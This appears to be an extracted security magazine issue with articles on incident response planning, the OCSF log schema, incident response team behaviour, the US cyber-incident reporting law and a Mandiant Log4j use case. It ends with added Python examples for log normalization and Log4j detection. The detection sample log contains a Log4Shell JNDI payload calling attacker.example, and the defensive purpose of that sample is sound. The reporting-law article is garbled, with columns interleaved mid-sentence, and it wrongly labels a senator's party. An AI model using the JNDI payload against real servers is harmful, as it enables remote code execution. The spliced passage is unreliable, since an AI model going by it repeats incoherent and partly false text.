FEATURE
Creating an Effective Incident Response Plan
November 2022

Business leaders and the boards of directors they report to are increasingly accepting the uncomfortable reality that there is little question that their organizations will fall victim to a cyber incident — but when, and how material will it be?

Dismissing the current risk of an attack puts leaders at risk of breaching their fiduciary responsibilities to their shareholders, customers, and business partners. Naturally, this requires them to double down on their investments in maintaining comprehensive cyber-protection strategies. But even those who do are never entirely immune to a potential breach. Consequently, no cybersecurity protection plan can be complete without an effective incident response plan.
Security leaders anticipate such attacks will continue to escalate during the next two years. The discovery of new and more pervasive vulnerabilities, such as Log4j, contributed to the sharp rise in attempted cyberattacks in late 2021. According to a Check Point Research survey, the number of attempted attacks per week on corporate networks worldwide increased 50% last year compared with 2020.

An external attacker can breach and gain access to the network resources of 93% of organizations, according to a survey by Positive Technologies. Further, 100% of respondents to the survey acknowledged that an internal attacker could gain complete control of their networks. The survey also revealed that nearly a third of CISOs and CEOs are unprepared to respond to the changing threat landscape.

Growing Focus on Incident Response Planning

Many organizations don’t have effective incident response plans. A 2021 Ponemon Institute survey found that only 46% have specific incident response plans for at least one of eight cyberattack types: DDoS, malware, phishing, insider incident, BEC, disaster recovery, supply chain attack, and advanced persistent threats (APTs).

The good news is that organizations are becoming more proactive about creating a plan rather than realizing after an attack that they needed one, says LeeAnne Pelzer, consulting director and leader of Unit 42, Palo Alto Networks’ cybersecurity consulting practice. Pelzer notes that, a few years ago, whenever her team was called in to create an incident response plan, it was always after the client had suffered an attack. Now, she adds, “they’re starting to allocate time, money, and energy toward getting in front of an incident before it actually occurs.”

Many organizations’ incident response plans are “shelfware,” Pelzer says. “They aren’t written in a way that [they] can actually be used when you’re going through what could arguably be your worst day at work and your brain is not firing on all cylinders.”

The plans often lack incident categorization and call trees with defined roles and responsibilities, experts say. They also don’t always specify procedures for how to address ransomware attacks and whether to pay attackers.

Michael Corcione, principal of the PFK O’Connor Davies cybersecurity and privacy advisory service, conducted 40 different incident response reviews for new clients during a three-month period. Corcione says all of the clients had an incident response plan in some form, but the plans varied in maturity.

“Quite a few have plans, but they are not formalized or documented,” Corcione explains. He emphasizes that these are private companies that aren’t beholden to industry or SEC regulations. “What really drives the maturity of companies’ incident response plans is going to be the regulations,” he says. “For example, health care is very heavily regulated, as well as financial services. You won’t see a financial service company that doesn’t have an incident response plan.”

Coordinating an Effective Response Plan

Greg Kelley, founder and CTO of Vestige Digital Investigations, says the first step in creating an incident response plan is to define the prominent people in the organization who will respond to an incident. Typically, that includes the CEO, presidents, or other C-level executives, as well as legal, IT, public relations, and department managers.

Experts widely recommend aligning an incident response plan with the National Institute of Standards and Technology’s (NIST’s) recommendations published in its Computer Security Incident Handling Guide (Special Publication 800-61 Revision 2). Among its many recommendations, the NIST framework breaks down four steps organizations should take to build their plan:

1. Preparation: Build and maintain an incident handler communications plan with contact information, incident reporting mechanisms, an issue tracking system, a war room, and encryption software for communications.
2. Detection and analysis: Understand attack vectors such as malware in email, malicious websites, impersonation, removable media, brute force, and unusual activity, and use alerting tools including IDPSs, SIEMs, antivirus and antispam, and logs. For analysis, this should include network system profiling, understanding normal behaviors, creating log retention policies, and performing event correlation.
3. Containment, eradication, and recovery: Identify attackers by validating host IP addresses, using incident databases, monitoring attackers’ communications channels, and researching through search engines. The response team should conduct eradication and recovery in a phased approach based on prioritization.
4. Post-incident activity: Determine how the organization may have avoided an attack by posing questions including: What happened? When? And what steps did the response team take that may have impeded recovery?

Setting Expectations and Customizing the Response Playbook

“NIST and other frameworks definitely set the foundation, and they give you the guardrails to stay within,” PFK O’Connor Davies’ Corcione says. “But when doing an assessment and review with a company, it’s much better for us to have a dialogue with them.”

The first important step is that the sponsor of an incident response plan must have the full support of leadership. Without leadership buy-in, the incident response plan will be destined to fail. Leadership must be on board with the overall approach and strategy, and willing to allocate budgets and resources toward the procedures that the incident response plan will include.

It’s critical to understand what company leaders want to get out of an incident response plan. They may want something like a granular playbook for different attack types, or they may be looking for a more generic “drive the ship” plan.

There are five other base components of an incident response plan:

1. Definitions and categorizations, such as what constitutes an event versus an incident and at what point it becomes a crisis.
2. A severity matrix that prioritizes each incident category. It should be clear when an incident falls into the different severity categories.
3. Roles and responsibilities that specify the core incident response team, including the decision authorities, senior executives, directors, external counsel, forensics, public relations, and insurance providers.
4. A communications plan that includes internal stakeholders as well as a lawyer-approved template specifying whom to contact first and when.
5. A training, testing, and maintenance schedule that includes simulated tabletop exercises that address the different attack vectors.

Testing and Tabletop Exercises

Developing a plan doesn’t end once everyone has signed off on it and created playbooks for various scenarios. Experts say organizations should update the plan at least
once yearly or after a significant event, including an incident or major infrastructure changes.

Ensuring that an incident response plan will actually work requires testing it under various simulated attacks.

“If the team feels comfortable leveraging these documents, it’s usually a pretty seamless process,” says Unit 42’s Pelzer. “However, they might find that depending on their unique processes, or their tech stack, that maybe the incident response plan is not resonating with them as much.”

While some organizations may find tabletop exercises too difficult or cumbersome to run, they play an important role in defense and incident response. It is essential to test all aspects of an incident response plan to verify that the executed actions generate the expected results. For instance, many organizations rely on the offline backup capabilities of their disaster recovery systems to recover their data in the event of a ransomware attack. However, failing to test that process during a ransomware response tabletop exercise can have devastating consequences.

Vestige Digital Investigations’ Kelley points to an incident where a client asked his firm to determine what caused an attack. The client wanted to determine if someone intentionally created the vulnerability that was exploited, or if it was an oversight. Kelley’s firm found that the attacker gained access because the Active Directory domain settings gave every employee admin rights. Effectively, this meant that every employee had access to everything on the system, a practice no organization would intentionally permit.

To determine what happened, Kelley wanted to see the backups of the Active Directory domain controllers. Kelley recalls: “The top executive said, ‘Sure, we back up our domain controllers.’ So, he called in the manager one level down, who then brought in the backup administrator. And the admin said, ‘Oh, that process has been broken for six months, and we don’t know why.’ And the IT director turned to him and said, ‘So, if Active Directory completely crashed, we would have to build [the controllers] from scratch?’ And he said, ‘That’s right.’ It was an uncomfortable moment.”

Kelley notes that such failures often happen in organizations because administrators are good at what they do but don’t understand the bigger picture. “He knows it’s important that those servers are backed up, but what he doesn’t know is what reliance the people up the food chain are putting on that process to work and how important it is to them that that process works,” he says. “It’s the two-way communication that breaks down.”

Corcione frequently sees the same types of issues. “There’s definitely a challenge with organizations doing role-based training, specifically for the people in incident response,” he says. “What you have in the security world is a lot of people who have moved up through the information technology space. But the response is a little bit different mindset. When you get into incident response, it’s really a big part of what’s going on from a business perspective. It’s not just a system that went down; we must bring it up. It’s the prioritization around the system.”

An incident response plan must prioritize what business processes are most important, with an understanding of what systems must be restored first. Corcione emphasizes that this process must be incorporated into the tabletop exercises and should include representatives from across the business.

“A lot of times, the IT team will go out and do an exercise and then say, ‘OK, technically, we took care of it all,’ but they didn’t involve the line of business. Communicating through those plans and doing role-based training on those responses is important but is an area where many firms lag.”
Putting Disclosure Policy into the Plan

Response plans should include an intra-organizational protocol for informing stakeholders of an incident, but they also must address disclosure to affected parties, including customers, partners, and suppliers. Insurance companies often require that their clients contact them before anyone else, though most experts say the first call should be internal and go to legal counsel. The decision-making on what to disclose and when is increasingly falling under the auspices of industry regulations, as well as state and federal laws.

New York was the first state to formalize regulations requiring banks and insurers, among others, to report cybersecurity incidents. The New York Department of Financial Services (NYDFS) regulation was enacted in 2017. “It is, in my view, still the strictest in the world because it requires somebody to sign off on an attestation,” Corcione says.

Nearly two years after the NYDFS regulation went into effect, the enforcement team found that 80% of the incidents reported were preventable if the affected firm implemented multifactor authentication, according to Corcione. “That intelligence really helps the community, and that’s what we’re trying to get at,” he says.

The unprecedented ransomware attack against Colonial Pipeline in May 2021, which shut down the 5,500-mile fuel pipeline for nearly a week, showed the catastrophic implications of an incident. President Biden signed into law the Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA) in March. The new law mandates that providers of infrastructure in 16 industries identified by the federal government report a cyberattack to the Cybersecurity and Infrastructure Security Agency (CISA) within 72 hours and within 24 hours of making a ransomware payment.

A month after that law was enacted, similar regulations went into effect for banks. As of April 1, all banks covered by the Federal Deposit Insurance Corp. are required to notify the agency of a cyber incident within 36 hours of discovering it.

Now pending is a proposal by the Securities and Exchange Commission (SEC) that would mandate disclosures of incidents by all publicly traded companies and other companies for which it has oversight. SEC chair Gary Gensler issued a statement on the proposal in March, just after Biden signed the CIRCIA legislation. “A lot of issuers already provide cybersecurity disclosure to investors,” according to Gensler’s statement. “I think companies and investors alike would benefit if this information were required in a consistent, comparable, and decision-useful manner.”

Concerns About Disclosure Requirements

There are conflicting issues regarding required disclosures, especially regarding timing. The concern is that premature disclosure could weaken a victim’s hand when negotiating with attackers. Worse, it could antagonize attackers into taking severely damaging actions. Corcione notes that cases can occur when an attacker’s claims are confirmed as hoaxes after the victim investigates its exfiltration logs. Also at issue, according to Corcione, is the type of attack that is material enough to warrant disclosure.

“Materiality is really big,” he says. “The SEC is dealing with the question of what is that definition of materiality. And then, also, when do the clocks start ticking on the reporting requirement? Is it from when the incident started or from when materiality was determined? These are issues that need to be resolved.”

Increased Influence of Insurance Carriers

Soaring ransomware attacks have led insurance companies to play a central role in incident response planning. Before underwriting or renewing a cyber insurance policy, insurers have stepped up the requirements they’re placing on their clients. Corcione notes that insurers are now requiring clients to validate their claims. “The insurance industry on the cyber side for years has been doing their policy underwriting on a trust aspect,” Corcione says. “A client provided self-attestation, and everything was in place.”

But as insurers started investigating claims more closely, they discovered that not all their clients’ assessments were accurate. “Quite a few cases have come up recently where insurers are looking not to pay because people have said that they have multifactor authentication in their organization, but it turns out there was a breach. And while they had multifactor, they didn’t have it across the entire organization,” Corcione says. “In these cases, the attackers came in through the area where they didn’t have it.”

Insurers now require third-party attestation or hire experts to assess a client’s cybersecurity infrastructure and incident response plans. “They’re asking not only do you have an incident response plan, but are you specifically doing tabletop exercises for ransomware attacks,” he says.

Coordinating IT and Business Operations

In addition to requiring buy-in from a board of directors and CEO, effective security incident management plans must include coordination between IT and the business. When IT and top management aren’t on the same page, it is challenging to implement a proactive incident response plan.

Braden Perry, a litigation, regulatory, and government investigations attorney with law firm Kennyhertz Perry, says it’s vital that the CISO understands business operations and processes and can translate technical issues to the CEO and board.

“It’s becoming more critical, and almost imperative, that a committee has an experienced IT and cybersecurity liaison to be the go-between and translate the IT language into business and vice versa,” Perry says.

Unfortunately, most CEOs and board members defer on issues they don’t understand. “When an IT department presents a robust plan for proactive IT security, it may go ignored or disregarded,” Perry says. “This can lead to a reactive plan only that focuses on the when as opposed to prevention.”

Similarly, Perry emphasizes that companies should have at least one board member who is knowledgeable about IT security and can communicate it to others. “When I am engaged to investigate and report, it ordinarily is an issue that could have been resolved without outside counsel,” Perry says. “But a lack of clear communications between IT and the board stymied that understanding.”

About the Author: Jeffrey Schwartz is a journalist who has covered information security and all forms of business and enterprise IT, including client computing, data center and cloud infrastructure, and application development for more than 30 years. Jeff is a regular contributor to Channel Futures.
NEWS
New Cross-Industry Group Launches Open Cybersecurity Framework

Amazon Web Services (AWS) and Splunk are leading an industry effort of 18 systems and security vendors to standardize how different monitoring systems share security alerts. The goal is to deliver a simplified and vendor-agnostic taxonomy to help security teams ingest and analyze security data faster.

The companies announced the Open Cybersecurity Schema Framework (OCSF) during the Black Hat USA conference. The participating companies are Broadcom (Symantec), Cloudflare, CrowdStrike, DTEX, IBM Security, IronNet, JupiterOne, Okta, Palo Alto Networks, Rapid7, Salesforce, Securonix, Sumo Logic, Tanium, Trend Micro, and Zscaler.

Detecting and stopping today’s cyberattacks requires coordination across cybersecurity tools, but many of these tools are not interoperable, and there are too many different data formats. The OCSF specification will normalize security telemetry across various security products and services, Mark Ryland, director of the office of the CISO at AWS, wrote in a blog post announcing the project.

“Security teams have to correlate and unify data across multiple products from different vendors in a range of proprietary formats,” Ryland wrote. “Instead of focusing primarily on detecting and responding to events, security teams spend time normalizing this data as a prerequisite to understanding and response.”

OCSF, which extends the ICD Schema specifications originally developed by Broadcom’s Symantec division, offers a collection of data types, an attribute dictionary, and a taxonomy written in JSON, according to an overview of the specification available on GitHub. Contributors can utilize and extend the framework and map the various data ingestion and normalization schemas in a common threat detection language.

“As practitioners, one of the most challenging problems in technology is connecting finding and event information across multiple vendor tools, operating systems, and versions,” says Jamie Scott, product manager at Endor Labs. “A standard data format will reduce cost and accelerate incident triage for our industry as a whole,”
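As an added illustration of the normalization OCSF is meant to enable (example code written for this edit, not code from the OCSF project or from any vendor named in the article), the Python below maps two constructed vendor log formats onto one OCSF-style Authentication event and then correlates failed logons across both sources, which is the kind of cross-tool triage the article says a common format should make cheaper. The numeric class, category, activity, status and severity ids and the field names are taken from the public OCSF schema as I recall it; treat them as assumptions and check them against the schema browser before relying on them.

```python
"""Normalize two constructed vendor log formats into OCSF-style Authentication
events and correlate failed logons across them.

Assumptions (not from the article): the class/category/activity/status/severity
ids and field names follow the public OCSF schema as the editor recalls it;
verify them against the OCSF schema browser before relying on them.
"""
import json
import re
from collections import Counter
from datetime import datetime, timezone

# OCSF Authentication event class (category: Identity & Access Management).
CLASS_UID_AUTHENTICATION = 3002   # assumed from the OCSF schema
CATEGORY_UID_IAM = 3              # assumed from the OCSF schema
ACTIVITY_LOGON = 1                # activity_id: Logon (assumed)
STATUS_SUCCESS, STATUS_FAILURE = 1, 2
SEVERITY_INFORMATIONAL, SEVERITY_MEDIUM = 1, 3
SCHEMA_VERSION = "1.0.0"

# Constructed sample input: vendor A emits JSON records, vendor B syslog-style lines.
VENDOR_A_JSON = ('{"ts": "2022-11-01T10:15:00Z", "user": "alice", "src": "10.0.0.5", '
                 '"result": "FAIL", "msg": "bad password"}')
VENDOR_B_DENIED = "Nov  1 10:15:07 vpn01 authd: login user=alice from=10.0.0.5 outcome=denied"
VENDOR_B_ACCEPTED = "Nov  1 10:16:00 vpn01 authd: login user=bob from=10.0.0.9 outcome=accepted"


def _authentication_event(product, time_ms, user, src_ip, success, message=""):
    """Build one OCSF-shaped Authentication event from already-parsed fields."""
    return {
        "class_uid": CLASS_UID_AUTHENTICATION,
        "category_uid": CATEGORY_UID_IAM,
        "activity_id": ACTIVITY_LOGON,
        "time": time_ms,  # OCSF timestamps are epoch milliseconds
        "status_id": STATUS_SUCCESS if success else STATUS_FAILURE,
        "severity_id": SEVERITY_INFORMATIONAL if success else SEVERITY_MEDIUM,
        "actor": {"user": {"name": user}},
        "src_endpoint": {"ip": src_ip},
        "message": message,
        "metadata": {"version": SCHEMA_VERSION, "product": {"name": product}},
    }


def from_vendor_a(raw_json):
    """Map a vendor A JSON record (constructed format) onto the common schema."""
    rec = json.loads(raw_json)
    ts = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return _authentication_event(
        product="VendorA Gateway",
        time_ms=int(ts.timestamp() * 1000),
        user=rec["user"],
        src_ip=rec["src"],
        success=(rec["result"] == "OK"),
        message=rec.get("msg", ""),
    )


_VENDOR_B_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<hms>\d\d:\d\d:\d\d) \S+ authd: "
    r"login user=(?P<user>\S+) from=(?P<ip>\S+) outcome=(?P<outcome>\w+)$"
)


def from_vendor_b(line, year=2022):
    """Map a vendor B syslog-style line (constructed format) onto the common schema.
    Syslog lines carry no year, so the caller supplies it."""
    m = _VENDOR_B_RE.match(line)
    if m is None:
        raise ValueError(f"unrecognized vendor B line: {line!r}")
    ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['hms']}",
                           "%Y %b %d %H:%M:%S").replace(tzinfo=timezone.utc)
    return _authentication_event(
        product="VendorB VPN",
        time_ms=int(ts.timestamp() * 1000),
        user=m["user"],
        src_ip=m["ip"],
        success=(m["outcome"] == "accepted"),
        message=f"outcome={m['outcome']}",
    )


def repeated_failures(events, threshold=2):
    """Count failed logons per (user, source IP) across all normalized events,
    whichever vendor produced them, and return the pairs at or above threshold."""
    counts = Counter(
        (ev["actor"]["user"]["name"], ev["src_endpoint"]["ip"])
        for ev in events
        if ev["class_uid"] == CLASS_UID_AUTHENTICATION and ev["status_id"] == STATUS_FAILURE
    )
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    normalized = [from_vendor_a(VENDOR_A_JSON),
                  from_vendor_b(VENDOR_B_DENIED),
                  from_vendor_b(VENDOR_B_ACCEPTED)]
    for ev in normalized:
        print(json.dumps(ev, sort_keys=True))
    print("repeated failures:", repeated_failures(normalized))
```

The correlation step only works because both parsers emit the same field names and the same status ids; before normalization the two failures for alice would sit in two different formats that no single query could match.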
An Extensible Framework for Interoperability

As an open source project, OCSF seeks to provide an extensible framework for providing interoperable core security schema not tied to a specific provider, Splunk distinguished engineer Paul Agbabian wrote in a white paper documenting OCSF. Licensed under the Apache License 2.0, OCSF features an agnostic storage format, data collection, and extract, transform, and load (ETL) processes. The schema browser represents categories, event classes, dictionaries, data types, profiles, and extensions.

“Vendors and other data producers can adopt and extend the schema for their specific domains,” Agbabian explained in a separate blog post. “Data engineers can map existing schemas to help security teams simplify data ingestion and normalization so that data scientists and analysts can work with a common language for threat detection and investigation.”

“Having a common data format for these events to be shared across tooling will make both consumers’ and producers’ lives easier. Producers can more easily integrate with other solutions and consumers can aggregate and triage incidents,” Scott says.

The OCSF shares some similar taxonomy with the widely used MITRE ATT&CK Framework, according to the white paper, though it also noted some stark differences. The most notable is that OCSF is extensible by vendors and customers, while MITRE releases all content for ATT&CK.

An Enterprise Strategy Group and Information Systems Security Association (ISSA) survey found that 77% of cybersecurity professionals want to see the industry forge support for open standards. The same survey found that 85% see integration among products as essential.

“Cybersecurity is ready to move on from silos and into an open, integrated era of interoperability and cooperation,” Agbabian noted.

Normalizing Security Telemetry

The project is open to other providers wishing to participate and contribute, according to Ryland.

“We see value in contributing our engineering efforts and also projects, tools, training, and guidelines to help standardize security telemetry across the industry,” he wrote. “Although we as an industry can’t directly control the behavior of threat actors, we can improve our collective defenses by making it easier for security teams to do their jobs more efficiently.”

The status of the OCSF and when vendors will begin testing wasn’t immediately apparent. And it remains to be seen to what extent the vendors will ultimately contribute to OCSF and implement it.

“The biggest threat to an early-stage effort like OCSF is the steering committee composition itself. Since the committee is made largely of vendors, representative consumer organizations will need a seat at the table to help drive adoption across vendors,” Scott says. “As the OCSF continues to collaborate with the industry, it should ensure that the steering committee has reserved spots for industry practitioners who are willing to make an investment in their mission.”

Erkang Zheng, founder and CEO of cyber operations platform provider JupiterOne, is pledging to embrace and participate in extending OCSF.

“Over time, we will continue to contribute to the OCSF initiative by extending the framework to cover both time-series event data and stateful/structural asset data, leveraging JupiterOne’s open-source data model,” Zheng wrote. “Our hope in participating in this initiative is to inspire more cross-industry collaboration.”

Scott adds: “Solving a problem like this is a journey that will require learnings across the industry. But the destination makes the journey worth it.”

About the Author: Jeffrey Schwartz is a journalist who has covered information security and all forms of business and enterprise IT including client computing, data center and cloud infrastructure, and application development for more than 30 years. Jeff is a regular contributor to Channel Futures.
ANALYSIS
Applying Behavioral Psychology to Strengthen Your Incident Response Team

Cybersecurity incident response teams (CSIRTs) rely on technical and social skills. But focusing mostly on technical knowledge can come at the expense of communication and teamwork, according to a study.

This idea was the focus of a five-year study analyzing incident response teams from a social-behavioral perspective. From 2012 to 2017, a team of researchers funded by the US Department of Homeland Security interviewed more than 200 people and led 80 focus groups across 17 international organizations to identify the key drivers of teamwork within and between teams.

The researchers included several people from George Mason University (GMU) who teamed up with Dartmouth and HP, and received funding from the Swedish and Dutch governments, says Dr. Daniel Shore, chief research officer at Leadership & Effective Teamwork Strategies (LETS), who worked on the study while he was at GMU.

“Across our team of researchers and practitioners, we put in over 56,000 hours of analysis and interviewing, to data gathering and analysis, to understand … not only what an individual on the team does but the team they represent, or the multiteam system they represent,” Shore says.

Bionic CEO Mark Orlando discovered this research as part of his own work looking into how security teams can better work together. “It really resonated with me,” he says. “I thought the research was great; there were a lot of very practical things in there that I was able to use in my work.” He began to reference the research and as a result, he was later connected to Shore.

“What was identified early on that spurred that research …was the idea that in cybersecurity, there are lots of analysts and front-line eyes-on-glass people who are very egocentric — not to say they’re egotistical, but egocentric,” Shore explains. “They see things from their own perspective; they’re used to being able to say, ‘I can handle this challenge on my own.’”

It makes sense, he continues. Many security pros are trained individually; they learn how to hack, investigate, and test on their own. Then they’re dropped into situations in which they face complex problems and challenges that require collaboration, but they don’t have the background and habits that come with working collaboratively in a multiteam system.

Orlando says it’s natural for relationships to form, and for trust to form, in an incident response team and within a larger organization. In his experience, he often encounters what he calls the “rock star problem.”

“You’ve got one or a few people [who are] very, very capable, very knowledgeable, and the team sort of coalesces around those individuals,” he says. “Which is not necessarily a bad thing, but it can create issues when those individuals inevitably move on, or maybe they [have] less than optimal work habits, or behaviors, or things we want to try to account for.”

Compounding CSIRTs’ collaboration issues is a prominent focus on technical tools and skills, Orlando adds. Incident response teams are “often inundated” with tools to address technical problems in security and incident response; however, there is a “definite lack” of tools to address some of the social and collaboration challenges CSIRTs face in operating within the context of a multigroup, multiteam system as they need to do.

A Framework to Tackle the Problem

In a Black Hat Europe briefing, “Building Better CSIRTs Using Behavioral Psychology,” Orlando and Shore discussed these challenges in depth and provided a framework for applying behavioral psychology principles to improve CSIRTs’ social maturity, as well as tools to improve the skills defenders need to more effectively work together.

“You can be a little bit more deliberate, and a little bit more focused, about how those relationships form and about how knowledge is shared,” says Orlando, noting the importance of how CSIRTs work together with other teams across the business. Having an effective incident response team doesn’t necessarily mean you’ll be successful as a security organization, he adds.

“You have to work as part of a larger ecosystem; security doesn’t just happen in a vacuum,” Orlando says.

One of these tools, for example, is called a goal hierarchy. Everybody has their own goals, team goals, and organizational goals, says Shore. Most people have already thought about this concept, but the idea here is to expand on the way businesses think about these goals from an individual’s perspective.

“The team goals don’t matter to the individual if the individual’s not part of the team goals,” he explains. “When you structure this goal hierarchy, it’s all stemming from the individual perspective. So what is the individual’s opportunity to give input to their own goals, to the team’s goals, to the organization’s goals?”

An individual can be given chances to understand this through all-hands meetings, cross-training, and shadowing other people’s work. At the organizational level, consider where there are opportunities for a person to be involved and feel invested in the organization’s goals.

“What happens is we end up in crisis after crisis,” Shore says, “and if we’re reactively trying to involve people in setting goals and validating those goals, it doesn’t play into the strength of what could be done proactively.”

About the Author: Kelly Sheridan is the former senior staff editor at Dark Reading.
NEWS
What the Newly Signed US Cyber-Incident Law Means for Security

When President Biden signed the omnibus spending bill in March, he also put the bipartisan Cyber Incident Reporting Act into effect, which requires critical infrastructure companies in the 16 industry sectors identified by the federal government to report to the Cybersecurity and Infrastructure Security Agency (CISA) within 72 hours if they are experiencing a cyberattack and within 24 hours of making a ransomware payment.

While this wasn’t the all-encompassing data breach law that has been stalled in Congress for many years, it was notable in that the Senate passed the legislation unanimously. The bill was championed by Sen. Gary Peters (D-Mich.) and Sen. Rob Portman (D-Ohio); it covers a broad swath of the economy, including the defense industrial base sector, which has more than 100,000 companies alone.

Game Changer

“It’s a game changer,” says Tom Kellermann, head of cybersecurity strategy at VMware. “It’s a fundamentally important strategic decision made by the federal government to finally eliminate the plausible deniability that had existed for far too long. ...Corporations have [for some time] underinvested in cybersecurity because they could always maintain plausible deniability.”

Kellermann argues that the new law will force companies to hire a CISO, give that person a budget, and provide detection response oversight.

“Companies need to show that they are taking this seriously,” Kellermann says. “They will either have to hire a CISO, or if they already have one, promote the CISO and make sure they have veto authority over the CIO. The general counsel will also have to become more familiar with privacy and cyber laws. They will need to work
hand-in-hand with the CISO in their information-sharing agencies like the DoJ and FBI and provide a standardized over time prove the correlation between the ransom pay-
efforts in public-private partnerships with the ISACs and method in which to deal with these attacks, prosecute ments and the bad threat actors.
working with CISA.” these perspective cyber hackers, and ensure that each “I would like to see a banning of ransomware payments
The new law gives CISA the authority to subpoena reporting entity has a well-defined cybersecurity strategy and explicit regulation as it relates to the exchanges,”
companies that fail to report cybersecurity incidents or that integrates security and operations across their re- Kellermann says. “But I’ve been in cybersecurity for 23
ransomware payments. Organizations that fail to com- spective networks.” years. To have true bipartisanship action in this regard
ply with the subpoena can be referred to the Depart- Davis McCarthy, principal security researcher at Valtix, is historic.”
ment of Justice. adds that the new incident reporting law stands as a pro-
The provision requires CISA to launch a program that active, collaborative approach by the federal government About the Author: Steve Zurier has more than 30 years of
journalism and publishing experience and has covered networking,
will warn organizations of vulnerabilities that ransomwareto combat the booming cybercrime industry. McCarthy
security, and IT as a writer and editor since 1992.
actors exploit, and directs CISA Director Jen Easterly to says data has become a valuable commodity in both tra-
establish a joint ransomware task force to coordinate fed-ditional and criminal markets.
eral efforts — in tandem with industry — to prevent and “They say that ‘knowing is half the battle,’ and this law
disrupt ransomware attacks. The omnibus law also au- will improve our collective understanding of who stole
thorizes $2.59 billion in funding to CISA, which was $300 the data, what data they want next, and what they stand
million above the Biden administration’s proposal. to gain by possessing it,” McCarthy says. “However,
“This is very significant legislation as it addresses the
the law uses policy to make a valuable security process
increasing cybersecurity threats amid rising concerns available to the public and critical infrastructure orga-
that Russia’s invasion of Ukraine could lead to Krem- nizations. The law does not enforce the output value:
lin-backed hackers attacking critical infrastructure such No one has to patch a critical vulnerability, harden their
as hospitals, power plants, and fuel pipelines,” notes cloud infrastructure, or threat hunt for recent ransom-
Chris Cruz, SLED CIO at Tanium. ware [indicators of compromise].”
VMware’s Kellermann would have liked to have seen
Centralized Repository lawmakers get tougher on the ransomware payments
CISA will have a centralized repository of information on and the cryptocurrency operators who manage the ran-
threat-actor plans, programs, and operations, he notes. som payments, many of whom have ties to North Korea
“This will allow information sharing among the critical and Russia. He says federal officials will collect data and
November 2022 13
Previous Next
SPONSORED CONTENT
MANDIANT PERSPECTIVES
PREPARING FOR CYBER DEFENSE AND MAINTAINING SECURITY CONTROL
In today’s evolving threat landscape, effective cyber defense is a necessity. However, in most organizations, defense capabilities are functionally fractured into silos of expertise and frustratingly disconnected from key objectives and the overall mission. A successful cyber-defense center requires taking a unified approach, spearheaded by a dedicated function.
As stated in The Defender’s Advantage, cyber defense is one of four closely integrated information security domains, alongside security governance, security architecture, and security risk management. Cyber defense is comprised of six critical functions that enable organizations to operate in the face of threats. A complete cyber-defense center includes threat intelligence, threat hunting, detection, response, validation, and command-and-control.
The command-and-control function is the nucleus to the unified approach to ensure that each area of expertise can support one another with clear visibility into the knowledge, experience, tools, and processes provided by each specialty. Key duties of this critical function include review of tactical inputs such as escalated incidents, detection of adversary behaviors, and identification of missed indicators of compromise from its neighboring five functions — to then organize, measure, and share orderly information across the holistic cyber-defense center.
For example, when a new threat has been identified (intelligence), the details are used to build new alerts (detection), escalated incidents are triaged and investigated (response), the presence of adversaries hiding in the network is found (hunt), and new attack patterns are simulated (validation). Although the threat was identified by the intelligence function, it does not serve as the nucleus of all activity. Instead, the command-and-control function is the hub for tracking the success of each action and brokering the exchange of information that drives resolution.
Sample Log4j Use Case of Six Cyber Defense Functions Working Together
Intelligence: IDENTIFY threat actors exploiting CVE-2021-44228; INFORM on infrastructure; INFORM on subsequent TTPs.
Validation: SCAN for vulnerable assets; PATCH CVE-2021-44228; TEST detections; GENERATE artifacts for Hunt/Response practice.
Hunt: ANALYZE DNS queries from vulnerable assets, look for potential environment variable
Command-and-Control: COORDINATE: Provide vulnerable inventory to Hunt; Initiate Validation after alerts are deployed; Activate Response if Hunt finds suspicious DNS queries; Communicate with leadership.
Detection: ALERT to suspicious JNDI strings; UPDATE IDS/WAF rules.
Response: RESTRICT egress capabilities; PLAN containment around Log4j applications.
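As an added example (not Mandiant’s code), the Detection and Hunt actions from the use case above over constructed data: Detection flags suspicious JNDI strings in web request logs and extracts the callback host, and Hunt checks DNS queries from the vulnerable inventory for that host or for names outside the internal zone. The log lines, IPs, hostnames, the “.corp.example” zone suffix and the asset inventory are all assumptions made up for the example.

```python
"""Added example, not Mandiant's code: Detection ALERTs on suspicious JNDI strings
in web request logs and Hunt ANALYZEs DNS queries from the vulnerable inventory,
as in the diagram. All log lines, hostnames, IPs and assets are constructed."""
import re

# A JNDI lookup anywhere in the line, case-insensitive; scheme and callback host
# are captured so Detection can hand them to Hunt as indicators.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)",
                     re.IGNORECASE)

def detect_jndi(log_lines):
    """Detection: one alert per request line that contains a JNDI lookup."""
    alerts = []
    for line in log_lines:
        m = JNDI_RE.search(line)
        if m:
            alerts.append({"src": line.split(" ", 1)[0],   # client IP is the first field
                           "scheme": m["scheme"].lower(),
                           "callback_host": m["host"].lower()})
    return alerts

def hunt_dns(dns_events, vulnerable_assets, callback_hosts, internal_suffix=".corp.example"):
    """Hunt: queries by assets on the vulnerable inventory that resolve a known callback
    host or leave the internal zone. Either is the 'suspicious DNS query' on which
    command-and-control activates Response."""
    leads = []
    for asset, qname in dns_events:
        qname = qname.lower().rstrip(".")
        if asset in vulnerable_assets and (qname in callback_hosts
                                           or not qname.endswith(internal_suffix)):
            leads.append((asset, qname))
    return leads

# Constructed sample inputs: web access log, (host, queried name) DNS log, and the
# vulnerable inventory that Validation's SCAN produced.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [11/Dec/2021:10:02:30 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79"',
]
SAMPLE_DNS = [("web01", "db01.corp.example."), ("web01", "attacker.example."),
              ("app07", "cdn.vendor.example."), ("web02", "intranet.corp.example.")]
VULNERABLE = {"web01", "web02"}

if __name__ == "__main__":
    alerts = detect_jndi(SAMPLE_LOG)
    print(alerts)
    print(hunt_dns(SAMPLE_DNS, VULNERABLE, {a["callback_host"] for a in alerts}))
```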
